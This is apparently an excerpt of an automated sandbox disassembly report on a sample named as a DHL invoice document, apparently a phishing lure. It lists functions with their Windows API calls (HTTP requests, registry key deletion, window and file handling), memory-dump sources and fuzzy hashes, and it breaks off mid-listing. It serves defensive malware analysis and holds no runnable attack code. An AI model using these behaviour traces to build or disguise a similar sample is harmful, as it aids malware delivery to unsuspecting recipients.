                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2178637699-0
                                                                                                                        • Opcode ID: 55ef2b9d2620f876dd3a8894c490e6a9a19c5aac9bbdd99a278ff32f5b9d304e
                                                                                                                        • Instruction ID: b2f0b13c42bae23d9d8f28f58a0f4f9fce3a4ce17b272bfb8beb92b7916097c5
                                                                                                                        • Opcode Fuzzy Hash: 55ef2b9d2620f876dd3a8894c490e6a9a19c5aac9bbdd99a278ff32f5b9d304e
                                                                                                                        • Instruction Fuzzy Hash: 04F1AF315043009FC726EF24C891B6EBBE4AF85318F19895DF9999F2A2CB71EC44CB52
                                                                                                                        Function 0033326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetMenuItemCount.USER32(00401990), ref: 00372F8D
                                                                                                                        • GetMenuItemCount.USER32(00401990), ref: 0037303D
                                                                                                                        • GetCursorPos.USER32(?), ref: 00373081
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0037308A
                                                                                                                        • TrackPopupMenuEx.USER32(00401990,00000000,?,00000000,00000000,00000000), ref: 0037309D
                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003730A9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 36266755-4108050209
                                                                                                                        • Opcode ID: 7abd737fdab54452e0026d1bea10e283f0635fc1404304a7622d49be763d13ae
                                                                                                                        • Instruction ID: b575dc201b0a9176f2d6f136a9b6340a41a27d1118852640351e9e71f31d53e0
                                                                                                                        • Opcode Fuzzy Hash: 7abd737fdab54452e0026d1bea10e283f0635fc1404304a7622d49be763d13ae
                                                                                                                        • Instruction Fuzzy Hash: 3F71E671644205BEEB338F25DC89FABBF68FF05364F208216F519AA1E0C7B5A910DB50
                                                                                                                        Function 00348BCD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00348F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00348BE8,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348FC5
                                                                                                                        • DestroyWindow.USER32(?), ref: 00348C81
                                                                                                                        • KillTimer.USER32(00000000,?,?,?,?,00348BBA,00000000,?), ref: 00348D1B
                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00386973
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869A1
                                                                                                                        • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000,?), ref: 003869B8
                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00348BBA,00000000), ref: 003869D4
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 003869E6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 641708696-2513823414
                                                                                                                        • Opcode ID: 4a9aebc986ef8dc2a303b0086e883644fab3776a2c94a49019d18cd8acee7a59
                                                                                                                        • Instruction ID: 8e0e7c5f1bcc7f64df366fd208e21300ea2487ed63d62ca343bf45ee07faaff3
                                                                                                                        • Opcode Fuzzy Hash: 4a9aebc986ef8dc2a303b0086e883644fab3776a2c94a49019d18cd8acee7a59
                                                                                                                        • Instruction Fuzzy Hash: 36617871502710DFCB27AF14DA89B29B7F5FB40312F159568E046AA9B0CB35BD90CF94
                                                                                                                        Function 003AC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC4B0
                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC4C3
                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC4D7
                                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003AC4F0
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003AC533
                                                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003AC549
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC554
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC584
                                                                                                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC5DC
                                                                                                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC5F0
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 003AC5FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3800310941-3916222277
                                                                                                                        • Opcode ID: a52d36612e1ca7d774226ce587fe01af40080d33ab892460f2e9cf1a11af7e68
                                                                                                                        • Instruction ID: ef53319b3283116355678a7b77bbe0bf56d54c63adae3c8ec743ee2e7f8fdba9
                                                                                                                        • Opcode Fuzzy Hash: a52d36612e1ca7d774226ce587fe01af40080d33ab892460f2e9cf1a11af7e68
                                                                                                                        • Instruction Fuzzy Hash: 99514BB1510204BFDB238F61C948EAA7BFCFF0A744F006519F949D6610DB35E944DB60
                                                                                                                        Function 00349838 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 137COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00349862
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ColorLongWindow
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 259745315-2513823414
                                                                                                                        • Opcode ID: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                                                                                                                        • Instruction ID: cea4c19b6bb1628bbceae7e752306fff377673fdf6d883762f4029431c03b37b
                                                                                                                        • Opcode Fuzzy Hash: 9320c48d443e5b82404dbade91b60119ed4079fa97096230c6f5663ba2c6469e
                                                                                                                        • Instruction Fuzzy Hash: A34185311046409FDB225F3D9C44FBA37E9AB46330F294656F9A68B1E1D731EC42DB10
                                                                                                                        Function 003C856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 003C8592
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85A2
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85AD
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85BA
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003C85C8
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85D7
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003C85E0
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85E7
                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85F8
                                                                                                                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,003CFC38,?), ref: 003C8611
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003C8621
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 003C8641
                                                                                                                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 003C8671
                                                                                                                        • DeleteObject.GDI32(?), ref: 003C8699
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003C86AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3840717409-0
                                                                                                                        • Opcode ID: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                                                                                                                        • Instruction ID: 97481e60935a43c1c16f7d23834e6ab07d61d21bb08d91a0730459e76b1e04d6
                                                                                                                        • Opcode Fuzzy Hash: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                                                                                                                        • Instruction Fuzzy Hash: 7A410C75610204AFDB129FA5DC48EAABBBCFF89711F154458F909E7260DB70AE01DB60
                                                                                                                        Function 003A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003A1502
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 003A150B
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003A1517
                                                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003A15FB
                                                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 003A1657
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 003A1708
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 003A178C
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003A17D8
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 003A17E7
                                                                                                                        • VariantInit.OLEAUT32(00000000), ref: 003A1823
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                        • API String ID: 1234038744-3931177956
                                                                                                                        • Opcode ID: f0dfe317f5ae2735f177dfb6a3f69cc0630a56a8fb73c487277a7bf40703bbc8
                                                                                                                        • Instruction ID: ed5174aaf77762885d7e0af0d2bfa7797c1d105e32500908807435ffa9eed73a
                                                                                                                        • Opcode Fuzzy Hash: f0dfe317f5ae2735f177dfb6a3f69cc0630a56a8fb73c487277a7bf40703bbc8
                                                                                                                        • Instruction Fuzzy Hash: 26D10E32E00505EBDB02AFA5D895BB9B7B9FF47700F14805AE846AF580DB30EC41DBA1
                                                                                                                        Function 003BB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                          • Part of subcall function 003BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BB6AE,?,?), ref: 003BC9B5
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BC9F1
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA68
                                                                                                                          • Part of subcall function 003BC998: _wcslen.LIBCMT ref: 003BCA9E
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003BB6F4
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003BB772
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?), ref: 003BB80A
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BB87E
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003BB89C
                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 003BB8F2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003BB904
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 003BB922
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 003BB983
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003BB994
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                        • API String ID: 146587525-4033151799
                                                                                                                        • Opcode ID: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                                                                                                                        • Instruction ID: f9f510fb033d6afbcb4213ee6e6b8c3293e8fcb49172fa0a99ab916e0d7f9c15
                                                                                                                        • Opcode Fuzzy Hash: 4b315ca804c4b4b1902c199458acc86794bafd1ee74d1eb6995fd2a60756bf34
                                                                                                                        • Instruction Fuzzy Hash: 93C19D34208201AFD712DF14C495F6AFBE5FF84318F15849CE69A8B6A2CBB1ED45CB91
                                                                                                                        Function 003C8D0E Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003C8D5A
                                                                                                                        • GetFocus.USER32 ref: 003C8D6A
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 003C8D75
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 003C8E1D
                                                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 003C8ECF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 003C8EEC
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 003C8EFC
                                                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 003C8F2E
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 003C8F70
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003C8FA1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                        • String ID: 0$xV
                                                                                                                        • API String ID: 1026556194-4207226023
                                                                                                                        • Opcode ID: 0adc8c1ef199f74c06fb63311ef4c7fc48a8a910c8a8f437724d0cfa6a5b6d22
                                                                                                                        • Instruction ID: 234f33bd56213dbd3803d9b6c134c70a19ae7c1999002fbcd41038655583ccca
                                                                                                                        • Opcode Fuzzy Hash: 0adc8c1ef199f74c06fb63311ef4c7fc48a8a910c8a8f437724d0cfa6a5b6d22
                                                                                                                        • Instruction Fuzzy Hash: 58817B715083019BD712CF24D884EABBBE9FB89754F15092DF989DB291DB30EE01CBA1
                                                                                                                        Function 003C541D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003C5504
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C5515
                                                                                                                        • CharNextW.USER32(00000158), ref: 003C5544
                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003C5585
                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003C559B
                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003C55AC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CharNext
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 1350042424-2513823414
                                                                                                                        • Opcode ID: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                                                                                                                        • Instruction ID: 626ba5d3d33078b0fa81ff6e589171cba67c51633fc7029a6b8baa7bfa8fd69c
                                                                                                                        • Opcode Fuzzy Hash: f21112e81912598c437ed54f0767f0a3d534810b190190dca693c82580fb77c0
                                                                                                                        • Instruction Fuzzy Hash: 64619C31904608ABDF129F55CC84EFE7BBDEB0A321F148149F925EA291D774AEC0DB60
                                                                                                                        Function 003B255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 003B25D8
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003B25E8
                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 003B25F4
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 003B2601
                                                                                                                        • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003B266D
                                                                                                                        • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003B26AC
                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003B26D0
                                                                                                                        • SelectObject.GDI32(?,?), ref: 003B26D8
                                                                                                                        • DeleteObject.GDI32(?), ref: 003B26E1
                                                                                                                        • DeleteDC.GDI32(?), ref: 003B26E8
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 003B26F3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                        • Opcode ID: e987be8f74879bee4ddd0b28704b26de7ab92189839ff8d37be71768e713c489
                                                                                                                        • Instruction ID: a6b80b54b716300d19dbed2ed2fd355c3818698280649b8ccc60aca294d095be
                                                                                                                        • Opcode Fuzzy Hash: e987be8f74879bee4ddd0b28704b26de7ab92189839ff8d37be71768e713c489
                                                                                                                        • Instruction Fuzzy Hash: F161E275D00219EFCB05CFA8D884EAEBBB9FF48310F248529EA59A7650D770A951CF50
                                                                                                                        Function 0036DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 0036DAA1
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D659
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D66B
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D67D
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D68F
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6A1
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6B3
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6C5
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6D7
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6E9
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D6FB
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D70D
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D71F
                                                                                                                          • Part of subcall function 0036D63C: _free.LIBCMT ref: 0036D731
